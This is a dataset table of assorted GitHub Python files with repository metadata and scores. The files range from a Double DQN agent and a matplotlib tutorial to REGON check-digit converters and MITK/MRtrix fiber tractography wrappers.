max_stars_repo_path (string, 4-197 chars) | max_stars_repo_name (string, 6-120 chars) | max_stars_count (int64, 0-191k) | id (string, 1-8 chars) | content (string, 6-964k chars) | score (float64, -0.88-3.95) | int_score (int64, 0-4)
---|---|---|---|---|---|---|
malib/value_functions/__init__.py | wwxFromTju/malib | 6 | 38404 | <reponame>wwxFromTju/malib<gh_stars>1-10
from malib.value_functions.value_function import (
MLPValueFunction,
CommNetValueFunction,
BiCNetValueFunction,
)
# __all__ = ["MLPValueFunction"]
| 0.490234 | 0 |
scripts/run-and-rename.py | mfs6174/Deep6174 | 0 | 38532 | <filename>scripts/run-and-rename.py
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
# File: run-and-rename.py
# Date: Thu Sep 18 15:43:36 2014 -0700
# Author: <NAME> <<EMAIL>>
import numpy as np
from scipy.misc import imread, imsave
from itertools import izip
import sys, os
import shutil
import os.path
import glob
if len(sys.argv) != 3:
print "Usage: {0} <input directory with images> <model>".format(sys.argv[0])
sys.exit(0)
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '../')))
from network_runner import NetworkRunner, get_nn
from lib.imageutil import get_image_matrix
from dataio import read_data
from lib.progress import Progressor
input_dir = sys.argv[1]
output_dir = os.path.join(input_dir, 'predicted')
shutil.rmtree(output_dir, ignore_errors=True)
os.mkdir(output_dir)
print "Reading images from {0}".format(input_dir)
print "Writing predicted results to {0}".format(output_dir)
model_file = sys.argv[2]
nn = get_nn(model_file)
print "Running network with model {0}".format(model_file)
# Run the network against a directory of images,
# and put predicted label in the filename
tot, corr = 0, 0
for f in glob.glob(input_dir + '/*'):
if not os.path.isfile(f):
continue
img = imread(f) / 255.0
pred = nn.predict(img)
label = f.split('-')[-1].split('.')[0]
new_fname = "{:04d}:{}-{},{}.png".format(tot, label, pred[0],
''.join(map(str, pred[1:])))
imsave(os.path.join(output_dir, new_fname), img)
tot += 1
corr += label == ''.join(map(str, pred[1:1+pred[0]]))
if tot > 0 and tot % 1000 == 0:
print "Progress:", tot
print corr, tot
| 1.65625 | 2 |
csvorm/relations.py | AppexX/python-csvorm | 2 | 38660 | class RelationType(object):
ONE_TO_MANY = "one_to_many"
ONE_TO_ONE = "one_to_one"
class Relation(object):
def __init__(self, cls):
self.cls = cls
class HasOne(Relation):
def get(self, id):
return self.cls.get(id=id)
class HasMany(Relation):
def get(self, id):
value = []
tokens = id.split(",")
for token in tokens:
value += (self.cls.get(id=token.strip()))
return value
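
# Illustrative sketch (hypothetical model, not part of this module): the relation
# classes above expect the wrapped class to expose a classmethod-style get(id=...).
# Note that HasMany.get() extends a list with the result, so for HasMany the wrapped
# class's get() is expected to return an iterable.
#
#     class Author(object):
#         @classmethod
#         def get(cls, id):
#             ...  # look up and return record(s) for this id
#
#     author_rel = HasOne(Author)
#     author = author_rel.get("42")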
| 2.359375 | 2 |
chapter09/idqn/ddqn_agent.py | roiyeho/drl-book | 0 | 38788 | <filename>chapter09/idqn/ddqn_agent.py<gh_stars>0
import numpy as np
import tensorflow as tf
from tensorflow import keras
from idqn.dqn_agent import DQNAgent
class DoubleDQNAgent(DQNAgent):
def __init__(self, env, config):
"""
:param env: the gym environment where the agent will run
:param config: a set of hyperparameters
"""
super().__init__(env, config)
def train(self, observations, actions, rewards, next_observations, dones):
# Use the online network to select the best actions for the next observations
next_q_values = self.q_network.predict(next_observations)
best_next_actions = np.argmax(next_q_values, axis=1)
# Use the target network to estimate the Q-values of these best actions
next_best_q_values = self.target_network.predict(next_observations)
next_best_q_values = next_best_q_values[np.arange(len(next_best_q_values)), best_next_actions]
target_q_values = rewards + (1 - dones) * self.config.gamma * next_best_q_values
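        # Illustrative numbers: with gamma = 0.99, reward = 1.0, done = 0 and a
        # target-network Q-value of 2.0 for the action chosen by the online network,
        # the target above is 1.0 + (1 - 0) * 0.99 * 2.0 = 2.98.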
with tf.GradientTape() as tape:
# Forward pass: compute the Q-values for the observations in the batch
all_q_values = self.q_network(observations)
# Mask out the Q-values for the non-chosen actions
mask = tf.one_hot(actions, self.n_actions)
q_values = tf.reduce_sum(all_q_values * mask, axis=1)
# Compute the loss between the targets and the Q-values
loss_fn = keras.losses.Huber()
loss = loss_fn(target_q_values, q_values)
# Perform a gradient descent step to minimize the loss with respect
# to the model's trainable variables
gradients = tape.gradient(loss, self.q_network.trainable_variables)
self.optimizer.apply_gradients(zip(gradients, self.q_network.trainable_variables)) | 2.53125 | 3 |
modificar_pacientes.py | Ratius9919/TP-programacion | 0 | 38916 | import os
def crear_dni():  # Prompt for a value and, after validation to verify it is a DNI, return it.
valor = False
while valor == False:
try:
dni = input("[?] Por favor, ingrese su DNI: ")
if int(dni) > 1000000 and int(dni) < 200000000:
valor = True
except ValueError:
print("[!] Ingresaste un valor no valido.")
return dni
def escribir_archivo(lista):
with open("Pacientes.txt","a") as pacientes:
pacientes.write(f"{lista}\n")
def leer_archivo():
f = open ("Pacientes.txt", "r")
paciente = f.read()
f.close()
return paciente
def borrar_archivo():
with open("Pacientes.txt","a") as pacientes:
pacientes.truncate(0)
def lista():
pacientes = leer_archivo()
listar = pacientes.split("\n")
return listar
def buscar_dni(dni):
lista_pacientes = lista()
for i in range (len(lista_pacientes)):
paciente = lista_pacientes[i]
buscar = paciente.find(dni)
if buscar != -1:
return i
elif buscar == -1:
return buscar
def modificar_paciente(dni):
ubicacion = buscar_dni(dni)
if ubicacion == -1:
return -1
lista_pacientes = lista()
lista_paciente= lista_pacientes[ubicacion].split(";")
pregunta = int(input("[?] Que desea cambiar? [1] El DNI. [2] El nombre. [3] la edad. [0] Todos. [-1] Nada."))
if pregunta == 1:
lista_pacientes = lista_pacientes.pop(ubicacion)
lista_paciente[pregunta-1] = crear_dni()
if pregunta == 2:
lista_pacientes = lista_pacientes.pop(ubicacion)
nombre = input("[?] Ingrese su nombre por favor: ")
while nombre.isdigit():
nombre = input("[?] Ingrese su nombre por favor, solo letras: ")
lista_paciente[pregunta-1] = nombre
if pregunta == 3:
lista_pacientes = lista_pacientes.pop(ubicacion)
edad = input("[?] Edad: ")
while edad.isdigit() == False:
edad = input("[?] Ingrese su edad nuevamente. Solo numeros: ")
while int(edad) <= 17:
print("[!] Error, no se le puede inscribir si es menor de 17.")
edad = input("[?] Ingrese su edad nuevamente: ")
lista_paciente[pregunta-1] = edad
if pregunta == 0:
lista_pacientes = lista_pacientes.pop(ubicacion)
lista_paciente[0] = crear_dni()
nombre = input("[?] Ingrese su nombre por favor: ")
while nombre.isdigit():
nombre = input("[?] Ingrese su nombre por favor, solo letras: ")
lista_paciente[1] = nombre
edad = input("[?] Edad: ")
while edad.isdigit() == False:
edad = input("[?] Ingrese su edad nuevamente. Solo numeros: ")
while int(edad) <= 17:
print("[!] Error, no se le puede inscribir si es menor de 17.")
edad = input("[?] Ingrese su edad nuevamente: ")
lista_paciente[2] = edad
return lista_paciente
def modificar_lista(dni):
valor = modificar_paciente(dni)
if valor == -1:
print("[!] No se ha encontrado el DNI, volviendo a la pantalla anterior.")
return
lista_original = lista()
ubicacion = buscar_dni(dni)
lista_original.pop(ubicacion)
lista_original.insert(ubicacion,valor)
lista_str = str(lista_original)
lista_str.replace("["," ")
lista_str.replace("]"," ")
lista_str.replace("'"," ")
return lista_original
def main(dni):
valor = buscar_dni(dni)
if valor == -1:
return
lista = modificar_lista(dni)
borrar_archivo()
escribir_archivo(lista)
dni = input("¿Cual es el DNI que desea modificar?")
main(dni) | 2.46875 | 2 |
fastapi/signals/__init__.py | zhangnian/fastapi | 33 | 39044 | <reponame>zhangnian/fastapi
from blinker import signal
from fastapi.signals.signal_handler import *
sig_user = signal('userinfo_modifiy')
def register_signal_handlers():
sig_user.connect(on_userinfo_modify) | 0.882813 | 1 |
codeMania-python-matplotlib/tut8.py | JayramMardi/codeMania | 0 | 39172 | # chapter Matplotlib Plotting
'''
The plot() function is used to draw points (markers) in a diagram.
By default, the plot() function draws a line from point to point.
The function takes parameters for specifying points in the diagram.
Parameter 1 is an array containing the points on the x-axis.
Parameter 2 is an array containing the points on the y-axis.
If we need to plot a line from (1, 3) to (8, 10), we have to pass two arrays [1, 8] and [3, 10] to the plot function.
'''
# Draw a line in a diagram from position (1, 3) to position (8, 10):
import matplotlib.pyplot as plt
import numpy as r
import sys
x=r.array([1,9,])
y=r.array([4,10])
plt.plot(x,y)
plt.show()
'''
Plotting Without Line
To plot only the markers, you can use shortcut string notation parameter 'o', which means 'rings'.
'''
x=r.array([3,10])
y=r.array([0,34])
plt.plot(x,y,'o')
plt.show()
'''
Multiple Points
You can plot as many points as you like, just make sure you have the same number of points in both axis.
Example
Draw a line in a diagram from position (1, 3) to (2, 8) then to (6, 1) and finally to position (8, 10):
'''
x=r.array([1,2,4,9])
y=r.array([3,6,8,10])
plt.plot(x,y,label="red")
plt.show()
#Two lines to make our compiler able to draw:
plt.savefig(sys.stdout.buffer)
sys.stdout.flush()
'''
Default X-Points
If we do not specify the points on the x-axis, they will get the default values 0, 1, 2, 3 etc., depending on the length of the y-points.
So, if we take the same example as above, and leave out the x-points, the diagram will look like this:
'''
# Plotting without x-points:
ypoints=r.array([0,2,3,5,6,7,99])
plt.plot(ypoints)
plt.show()
plt.savefig(sys.stdout.buffer)
sys.stdout.flush()
# CHAPTER Matplotlib Markers
'''
Markers
You can use the keyword argument marker to emphasize each point with a specified marker:
'''
x=r.array([0,3,5,6,8,9])
y=r.array([2,4,6,7,8,10])
plt.plot(x,y,marker="*")
plt.show()
'''
Marker Reference
You can choose any of these markers:
Marker Description
'o' Circle
'*' Star
'.' Point
',' Pixel
'x' X
'X' X (filled)
'+' Plus
'P' Plus (filled)
's' Square
'D' Diamond
'd' Diamond (thin)
'p' Pentagon
'H' Hexagon
'h' Hexagon
'v' Triangle Down
'^' Triangle Up
'<' Triangle Left
'>' Triangle Right
'1' Tri Down
'2' Tri Up
'3' Tri Left
'4' Tri Right
'|' Vline
'_' Hline
'''
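# A small illustration using one of the markers from the table above (values chosen
# only for the example):
x = r.array([1, 2, 3, 4])
y = r.array([2, 4, 1, 6])
plt.plot(x, y, marker='D')
plt.show()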
'''
Format Strings fmt
You can also use the shortcut string notation parameter to specify the marker.
This parameter is also called fmt, and is written with this syntax:
marker|line|color
Example
Mark each point with a circle:
'''
x=r.array([3,5,5,6,7,8])
y=r.array([1,3,5,6,7,8])
plt.plot(x,y,'-.r')
plt.show()
'''
The marker value can be anything from the Marker Reference above.
The line value can be one of the following:
Line Reference
Line Syntax Description
'-' Solid line
':' Dotted line
'--' Dashed line
'-.' Dashed/dotted line
Note: If you leave out the line value in the fmt parameter, no line will be plotted.
'''
'''
Color Reference
Color Syntax Description
'r' Red
'g' Green
'b' Blue
'c' Cyan
'm' Magenta
'y' Yellow
'k' Black
'w' White
'''
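# A small illustration combining a marker, a line style and a color from the tables
# above in a single fmt string (values chosen only for the example):
x = r.array([1, 2, 3, 4])
y = r.array([3, 1, 4, 2])
plt.plot(x, y, 'o:g')
plt.show()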
'''
Marker Size
You can use the keyword argument markersize or the shorter version, ms to set the size of the markers:
'''
x=r.array([1,3,4,5,9,5])
y=r.array([0,3,6,8,8])
plt.plot(x,marker='o',ms=17)
plt.show()
'''
Marker Color
You can use the keyword argument markeredgecolor or the shorter mec to set the color of the edge of the markers:
Example
Set the EDGE color to red:
'''
x=r.array([2,3,5,6])
y=r.array([0,3,5,6,8])
plt.plot(x,marker='*',ms=34,mec='r')
plt.show()
'''
You can use the keyword argument markerfacecolor or the shorter mfc to set the color inside the edge of the markers:
Example
Set the FACE color to red:
'''
x=r.array([1,3,5,6])
y=r.array([2,3,5,6])
plt.plot(x,marker='*',ms=34,mfc='r')
plt.show()
'''
# Use both the mec and mfc arguments to set the color of the entire marker:
# Example
# Set the color of both the edge and the face to red:
'''
import matplotlib.pyplot as plt
import numpy as r
y=r.array([0,4,6,7,7,8])
plt.plot(y,marker='*',ms=30,mec='r',mfc='r')
plt.show()
'''
You can also use Hexadecimal color values:
Example
Mark each point with a beautiful green color:
...
plt.plot(ypoints, marker = 'o', ms = 20, mec = '#4CAF50', mfc = '#4CAF50')
...
'''
import matplotlib.pyplot as plt
import numpy as np
x=np.array([1,2,3,4,5,6,5,7])
y=np.array([1,2,4,5,5,6,])
plt.plot(y,ms=34,marker='*',mec='hotpink',mfc="hotpink",linestyle=':')
plt.show()
| 3.484375 | 3 |
examples/example_ME5ME6.py | bmachiel/python-substratestack | 1 | 39300 | #!/bin/env python
# import the technology's complete stack definition
from example import stack
# in order to decrease simulation times, some metal layers can be removed from
# the stack, allowing more oxide layers to be merged in the next step
stack.remove_metal_layer_by_name('PO1')
stack.remove_metal_layer_by_name('ME1')
stack.remove_metal_layer_by_name('ME2')
stack.remove_metal_layer_by_name('ME3')
stack.remove_metal_layer_by_name('ME4')
#stack.remove_metal_layer_by_name('ME5')
#stack.remove_metal_layer_by_name('ME6')
if __name__ == '__main__':
# Print the standardized stack to example_ME5ME6_std.pdf
stack.draw('example_ME5ME6_std', pages=3, single_page=True)
# Merge oxide layers to reduce the stack's complexity, decreasing simulation
# times
stack.simplify()
if __name__ == '__main__':
# Print the simplified stack to example_ME5ME6.pdf
stack.draw('example_ME5ME6', pages=3, single_page=True)
    # Write out a Momentum substrate definition file of the simplified stack
# write_momentum_substrate argument: filename (without extension),
# infinite ground plane
# NOTE: this might produce bad output when the stack has not been
# simplified before!
stack.write_momentum_substrate('example_ME5ME6', True)
    # Write out a Sonnet project that includes the simplified substrate stack
# write_sonnet_technology argument: filename (without extension)
# NOTE: this might produce bad output when the stack has not been
# simplified before!
stack.write_sonnet_technology('example_ME5ME6')
| 2.28125 | 2 |
ex105.py | erikamaylim/Python-CursoemVideo | 0 | 39428 | <reponame>erikamaylim/Python-CursoemVideo
"""Faça um programa que tenha uma função notas() que pode receber várias notas de alunos
e vai retornar um dicionário com as seguintes informações:
– Quantidade de notas
- A maior nota
– A menor nota
– A média da turma
– A situação (opcional)"""
def notas(* num, s=False):
"""
-> Função para coletar notas dos alunos e retornar informações gerais e a situação da turma.
:param num: Notas da turma
:param s: Situação (Boa, Razoável ou Ruim)
:return: dicionário com informações sobre a turma
"""
soma = sum(num)
qtd = len(num)
maior = max(num)
menor = min(num)
media = soma / qtd
if media >= 6:
sit = 'Boa'
elif media >= 5:
sit = 'Razoável'
else:
sit = 'Ruim'
total = {'Quantidade de notas': qtd, 'Maior nota': maior, 'Menor nota': menor, 'Média': media}
if s:
total['Situação'] = sit
return total
print(notas(2, 3, 5, 4, 1, 3, s=True))
print(notas(10, 7, 8, 10, s=True))
print(notas(4, 6, 7, 5, 6.5, 7, 5))
help(notas)
| 2.953125 | 3 |
Pluto/Systems/__init__.py | n8vm/Foton | 10 | 39556 | <gh_stars>1-10
from Pluto.Systems.Systems import *
| 0.186523 | 0 |
RegonAPI/converters.py | damianwasik98/RegonAPI | 10 | 39684 | <reponame>damianwasik98/RegonAPI
"""
Converters of codes
"""
from string import digits
from .exceptions import RegonConvertionError
from . import validators
REGON9_WEIGHTS = [8, 9, 2, 3, 4, 5, 6, 7]
REGON14_WEIGHTS = [2, 4, 8, 5, 0, 9, 7, 3, 6, 1, 2, 4, 8]
def regon8_to_9(regon8):
"""Convert REGON8 to REGON9
Parameters
----------
regon8 : str
REGON8
Returns
-------
str
REGON9
Raises
------
RegonConvertionError
If regon8 is not valid
"""
if not validators.is_valid_regon8(regon8):
raise RegonConvertionError(regon8)
a, b = list(regon8), REGON9_WEIGHTS
a = list(map(lambda x: int(x), a))
last_digit = sum(list(map(lambda x: x[0] * x[1], zip(a, b)))) % 11
regon9 = "{regon8}{last_digit}".format(regon8=regon8, last_digit=last_digit)
return regon9
def regon13_to_14(regon13):
"""Convert REGON13 to REGON14
Parameters
----------
regon13 : str
REGON13
Returns
-------
str
REGON14
Raises
------
RegonConvertionError
If regon13 is not valid
"""
if not validators.is_valid_regon13(regon13):
raise RegonConvertionError(regon13)
a, b = list(regon13), REGON14_WEIGHTS
a = list(map(lambda x: int(x), a))
last_digit = sum(list(map(lambda x: x[0] * x[1], zip(a, b)))) % 11
regon14 = "{regon13}{last_digit}".format(regon13=regon13, last_digit=last_digit)
return regon14
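
# Illustrative sketch (the input "12345678" is a made-up example and is not guaranteed
# to pass the validators): computing the REGON9 check digit "by hand", mirroring the
# weighted-sum logic of regon8_to_9() above.
if __name__ == "__main__":
    example = "12345678"
    check_digit = sum(int(d) * w for d, w in zip(example, REGON9_WEIGHTS)) % 11
    print(example + str(check_digit))  # -> 123456785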
| 2.703125 | 3 |
examples/fiber_tractography/TractographyHelper.py | MIC-DKFZ/cmdint | 8 | 39812 | <gh_stars>1-10
from cmdint import CmdInterface
import numpy as np
from shutil import copyfile
from dipy.io import read_bvals_bvecs
import os
""" This exapmple contains two classes that help with fiber tractography using MITK Diffusion and MRtrix. It is only
intended as a larger example of multiple usages of CmdInterface and NOT (yet) as a polished class that wraps
command line tools for fiber tractography and diffusion signal modelling.
"""
def flip_bvecs(input_dwi: str, output_dwi: str):
bvals, bvecs = read_bvals_bvecs(input_dwi.replace('.nii.gz', '.bvals'), input_dwi.replace('.nii.gz', '.bvecs'))
bvecs[:, 0] *= -1
np.savetxt(output_dwi.replace('.nii.gz', '.bvecs'), np.transpose(bvecs), fmt='%10.6f')
copyfile(input_dwi, output_dwi)
copyfile(input_dwi.replace('.nii.gz', '.bvals'), output_dwi.replace('.nii.gz', '.bvals'))
class MitkTrackingHelper:
def __init__(self):
pass
@staticmethod
def recon_qball(input_dwi, out_folder, sh_order: int, do_flip_bvecs: bool):
""" Perform analytical q-ball reconstruction with solid angle consideration and output the resulting
spherical harmonics ODFs.
"""
os.makedirs(out_folder, exist_ok=True)
if do_flip_bvecs:
flipper = CmdInterface(flip_bvecs)
flipper.add_arg('input_dwi', input_dwi, check_input=True)
input_dwi = input_dwi.replace(os.path.dirname(input_dwi), out_folder)
input_dwi = input_dwi.replace('.nii.gz', '_flipped.nii.gz')
flipper.add_arg('output_dwi', input_dwi, check_output=True)
flipper.run()
qball_recon = CmdInterface('MitkQballReconstruction')
qball_recon.add_arg(key='-i', arg=input_dwi, check_input=True)
qball_recon.add_arg(key='-o', arg=out_folder + 'odf_qball_mitk.nii.gz', check_output=True)
qball_recon.add_arg(key='--sh_order', arg=sh_order)
qball_recon.run()
return out_folder + 'odf_qball_mitk.nii.gz'
@staticmethod
def recon_tensor(input_dwi: str, out_folder: str, do_flip_bvecs: bool = False):
""" Perform diffusion tesnor modelling of the signal.
"""
os.makedirs(out_folder, exist_ok=True)
if do_flip_bvecs:
flipper = CmdInterface(flip_bvecs)
flipper.add_arg('input_dwi', input_dwi, check_input=True)
input_dwi = input_dwi.replace(os.path.dirname(input_dwi), out_folder)
input_dwi = input_dwi.replace('.nii.gz', '_flipped.nii.gz')
flipper.add_arg('output_dwi', input_dwi, check_output=True)
flipper.run()
tensor_recon = CmdInterface('MitkTensorReconstruction')
tensor_recon.add_arg(key='-i', arg=input_dwi, check_input=True)
tensor_recon.add_arg(key='-o', arg=out_folder + 'tensors_mitk.dti', check_output=True)
tensor_recon.run()
return out_folder + 'tensors_mitk.dti'
@staticmethod
def train_rf(i: str,
t: str,
out_folder: str,
masks: str = None,
wm_masks: str = None,
volume_modification_images: str = None,
additional_feature_images: str = None,
num_trees: int = 30,
max_tree_depth: int = 25,
sample_fraction: float = 0.7,
use_sh_features: bool = 0,
sampling_distance: float = None,
max_wm_samples: int = None,
num_gm_samples: int = None):
"""
Train a random forest for machine learning based tractography.
i: input diffusion-weighted images
t: input training tractograms
o: output random forest (HDF5)
masks: restrict training using a binary mask image (optional)
wm_masks: if no binary white matter mask is specified
volume_modification_images: specify a list of float images that modify the fiber density (optional)
additional_feature_images: specify a list of float images that hold additional features (float) (optional)
num_trees: number of trees (optional)
max_tree_depth: maximum tree depth (optional)
sample_fraction: fraction of samples used per tree (optional)
use_sh_features: use SH features (optional)
sampling_distance: resampling parameter for the input tractogram in mm (determines number of white-matter samples) (optional)
max_wm_samples: upper limit for the number of WM samples (optional)
num_gm_samples: Number of gray matter samples per voxel (optional)
"""
runner = CmdInterface('MitkRfTraining')
runner.add_arg(key='-i', arg=i, check_input=True)
runner.add_arg(key='-t', arg=t, check_input=True)
runner.add_arg(key='-o', arg=out_folder + 'forest_mitk.rf', check_output=True)
if masks is not None:
runner.add_arg(key='--masks', arg=masks)
if wm_masks is not None:
runner.add_arg(key='--wm_masks', arg=wm_masks)
if volume_modification_images is not None:
runner.add_arg(key='--volume_modification_images', arg=volume_modification_images)
if additional_feature_images is not None:
runner.add_arg(key='--additional_feature_images', arg=additional_feature_images)
if num_trees is not None:
runner.add_arg(key='--num_trees', arg=num_trees)
if max_tree_depth is not None:
runner.add_arg(key='--max_tree_depth', arg=max_tree_depth)
if sample_fraction is not None:
runner.add_arg(key='--sample_fraction', arg=sample_fraction)
if use_sh_features is not None:
runner.add_arg(key='--use_sh_features', arg=use_sh_features)
if sampling_distance is not None:
runner.add_arg(key='--sampling_distance', arg=sampling_distance)
if max_wm_samples is not None:
runner.add_arg(key='--max_wm_samples', arg=max_wm_samples)
if num_gm_samples is not None:
runner.add_arg(key='--num_gm_samples', arg=num_gm_samples)
runner.run()
return out_folder + 'forest_mitk.rf'
@staticmethod
def track_streamline(i: str,
out_folder: str,
algorithm: str,
flip_x: bool = False,
flip_y: bool = False,
flip_z: bool = False,
no_data_interpolation: bool = False,
no_mask_interpolation: bool = False,
compress: float = None,
seeds: int = 1,
seed_image: str = None,
trials_per_seed: int = 10,
max_tracts: int = -1,
tracking_mask: str = None,
stop_image: str = None,
exclusion_image: str = None,
ep_constraint: str = None,
target_image: str = None,
sharpen_odfs: bool = False,
cutoff: float = 0.1,
odf_cutoff: float = 0,
step_size: float = 0.5,
min_tract_length: float = 20,
angular_threshold: float = None,
loop_check: float = None,
prior_image: str = None,
prior_weight: float = 0.5,
restrict_to_prior: bool = False,
new_directions_from_prior: bool = False,
num_samples: int = 0,
sampling_distance: float = 0.25,
use_stop_votes: bool = False,
use_only_forward_samples: bool = False,
tend_f: float = 1,
tend_g: float = 0,
forest: str = None,
use_sh_features: bool = False,
additional_images: str = None):
"""
Perform MITK streamline tractography.
i: input image (multiple possible for 'DetTensor' algorithm)
out_folder: output folder
algorithm: which algorithm to use (Peaks
flip_x: multiply x-coordinate of direction proposal by -1 (optional)
flip_y: multiply y-coordinate of direction proposal by -1 (optional)
flip_z: multiply z-coordinate of direction proposal by -1 (optional)
no_data_interpolation: don't interpolate input image values (optional)
no_mask_interpolation: don't interpolate mask image values (optional)
compress: compress output fibers using the given error threshold (in mm) (optional)
seeds: number of seed points per voxel (optional)
seed_image: mask image defining seed voxels (optional)
trials_per_seed: try each seed N times until a valid streamline is obtained (only for probabilistic tractography) (optional)
max_tracts: tractography is stopped if the reconstructed number of tracts is exceeded (optional)
tracking_mask: streamlines leaving the mask will stop immediately (optional)
stop_image: streamlines entering the mask will stop immediately (optional)
exclusion_image: streamlines entering the mask will be discarded (optional)
ep_constraint: determines which fibers are accepted based on their endpoint location - options are NONE
        target_image: effect depends on the chosen endpoint constraint (option ep_constraint) (optional)
sharpen_odfs: if you are using dODF images as input
cutoff: set the FA
odf_cutoff: threshold on the ODF magnitude. this is useful in case of CSD fODF tractography. (optional)
step_size: step size (in voxels) (optional)
min_tract_length: minimum fiber length (in mm) (optional)
angular_threshold: angular threshold between two successive steps
loop_check: threshold on angular stdev over the last 4 voxel lengths (optional)
        prior_image: tractography prior in the form of a peak image (optional)
prior_weight: weighting factor between prior and data. (optional)
restrict_to_prior: restrict tractography to regions where the prior is valid. (optional)
new_directions_from_prior: the prior can create directions where there are none in the data. (optional)
num_samples: number of neighborhood samples that are use to determine the next progression direction (optional)
sampling_distance: distance of neighborhood sampling points (in voxels) (optional)
use_stop_votes: use stop votes (optional)
use_only_forward_samples: use only forward samples (optional)
tend_f: weighting factor between first eigenvector (f=1 equals FACT tracking) and input vector dependent direction (f=0). (optional)
tend_g: weighting factor between input vector (g=0) and tensor deflection (g=1 equals TEND tracking) (optional)
forest: input random forest (HDF5 file) (optional)
use_sh_features: use SH features (optional)
additional_images: specify a list of float images that hold additional information (FA
"""
os.makedirs(out_folder, exist_ok=True)
tracts = out_folder + os.path.basename(i).split('.')[0] + '_' + algorithm + '_mitk.trk'
runner = CmdInterface('MitkStreamlineTractography')
runner.add_arg(key='-i', arg=i, check_input=True)
runner.add_arg(key='-o', arg=tracts, check_output=True)
runner.add_arg(key='--algorithm', arg=algorithm)
if flip_x:
runner.add_arg(key='--flip_x')
if flip_y:
runner.add_arg(key='--flip_y')
if flip_z:
runner.add_arg(key='--flip_z')
if no_data_interpolation:
runner.add_arg(key='--no_data_interpolation')
if no_mask_interpolation:
runner.add_arg(key='--no_mask_interpolation')
if compress is not None:
runner.add_arg(key='--compress', arg=compress)
if seeds is not None:
runner.add_arg(key='--seeds', arg=seeds)
if seed_image is not None:
runner.add_arg(key='--seed_image', arg=seed_image)
if trials_per_seed is not None:
runner.add_arg(key='--trials_per_seed', arg=trials_per_seed)
if max_tracts is not None:
runner.add_arg(key='--max_tracts', arg=max_tracts)
if tracking_mask is not None:
runner.add_arg(key='--tracking_mask', arg=tracking_mask)
if stop_image is not None:
runner.add_arg(key='--stop_image', arg=stop_image)
if exclusion_image is not None:
runner.add_arg(key='--exclusion_image', arg=exclusion_image)
if ep_constraint is not None:
runner.add_arg(key='--ep_constraint', arg=ep_constraint)
if target_image is not None:
runner.add_arg(key='--target_image', arg=target_image)
if sharpen_odfs:
runner.add_arg(key='--sharpen_odfs')
if cutoff is not None:
runner.add_arg(key='--cutoff', arg=cutoff)
if odf_cutoff is not None:
runner.add_arg(key='--odf_cutoff', arg=odf_cutoff)
if step_size is not None:
runner.add_arg(key='--step_size', arg=step_size)
if min_tract_length is not None:
runner.add_arg(key='--min_tract_length', arg=min_tract_length)
if angular_threshold is not None:
runner.add_arg(key='--angular_threshold', arg=angular_threshold)
if loop_check is not None:
runner.add_arg(key='--loop_check', arg=loop_check)
if prior_image is not None:
runner.add_arg(key='--prior_image', arg=prior_image)
if prior_weight is not None:
runner.add_arg(key='--prior_weight', arg=prior_weight)
if restrict_to_prior:
runner.add_arg(key='--restrict_to_prior')
if new_directions_from_prior:
runner.add_arg(key='--new_directions_from_prior')
if num_samples is not None:
runner.add_arg(key='--num_samples', arg=num_samples)
if sampling_distance is not None:
runner.add_arg(key='--sampling_distance', arg=sampling_distance)
if use_stop_votes:
runner.add_arg(key='--use_stop_votes')
if use_only_forward_samples:
runner.add_arg(key='--use_only_forward_samples')
if tend_f is not None:
runner.add_arg(key='--tend_f', arg=tend_f)
if tend_g is not None:
runner.add_arg(key='--tend_g', arg=tend_g)
if forest is not None:
runner.add_arg(key='--forest', arg=forest)
if use_sh_features:
runner.add_arg(key='--use_sh_features')
if additional_images is not None:
runner.add_arg(key='--additional_images', arg=additional_images)
runner.run()
return tracts
@staticmethod
def mitkglobaltractography(i: str,
out_folder: str,
parameters: str,
mask: str = None):
"""
        Perform MITK global tractography. Save a parameter file for use with the MITK Diffusion GUI application.
http://mitk.org/wiki/MitkDiffusion
i: input image (tensor
out_folder: output folder
parameters: parameter file (.gtp)
mask: binary mask image (optional)
"""
os.makedirs(out_folder, exist_ok=True)
tracts = out_folder + os.path.basename(i).split('.')[0] + '_Global_mitk.trk'
runner = CmdInterface('MitkGlobalTractography')
runner.add_arg(key='-i', arg=i, check_input=True)
runner.add_arg(key='-o', arg=tracts, check_output=True)
runner.add_arg(key='--parameters', arg=parameters)
if mask is not None:
runner.add_arg(key='--mask', arg=mask, check_input=True)
runner.run()
return tracts
class MRtrixTrackingHelper:
@staticmethod
def recon_csd(input_dwi: str, do_flip_bvecs: bool, out_folder: str, algo: str = 'tournier'):
""" Perform constrained spherical deconvolution modelling and output the resulting spherical harmonics fODFs.
"""
os.makedirs(out_folder, exist_ok=True)
if do_flip_bvecs:
flipper = CmdInterface(flip_bvecs)
flipper.add_arg('input_dwi', input_dwi, check_input=True)
input_dwi = input_dwi.replace(os.path.dirname(input_dwi), out_folder)
input_dwi = input_dwi.replace('.nii.gz', '_flipped.nii.gz')
flipper.add_arg('output_dwi', input_dwi, check_output=True)
flipper.run()
csd_algo = 'csd'
num_responses = 1
if algo != 'tournier':
num_responses = 3
csd_algo = 'msmt_csd'
dwi2response = CmdInterface('dwi2response')
dwi2response.add_arg(arg=algo)
dwi2response.add_arg(arg=input_dwi, check_input=True)
for i in range(num_responses):
dwi2response.add_arg(arg=out_folder + 'response_' + algo + '_' + str(i) + '_mrtrix.txt', check_output=True)
dwi2response.add_arg(key='-force')
dwi2response.add_arg('-nthreads', 12)
dwi2response.add_arg(key='-fslgrad',
arg=[input_dwi.replace('.nii.gz', '.bvecs'), input_dwi.replace('.nii.gz', '.bvals')],
check_input=True)
dwi2response.run()
dwi2fod = CmdInterface('dwi2fod')
dwi2fod.add_arg(arg=csd_algo)
dwi2fod.add_arg(arg=input_dwi, check_input=True)
for i in range(num_responses):
dwi2fod.add_arg(arg=out_folder + 'response_' + algo + '_' + str(i) + '_mrtrix.txt', check_input=True)
dwi2fod.add_arg(arg=out_folder + 'odf_' + csd_algo + '_' + str(i) + '_mrtrix.nii.gz', check_output=True)
dwi2fod.add_arg(key='-force')
dwi2fod.add_arg('-nthreads', 12)
dwi2fod.add_arg(key='-fslgrad',
arg=[input_dwi.replace('.nii.gz', '.bvecs'), input_dwi.replace('.nii.gz', '.bvals')],
check_input=True)
dwi2fod.run(version_arg='--version')
return out_folder + 'odf_' + csd_algo + '_' + str(0) + '_mrtrix.nii.gz'
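        # NOTE: the statements below are never executed because of the return above.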
sh2peaks = CmdInterface('sh2peaks')
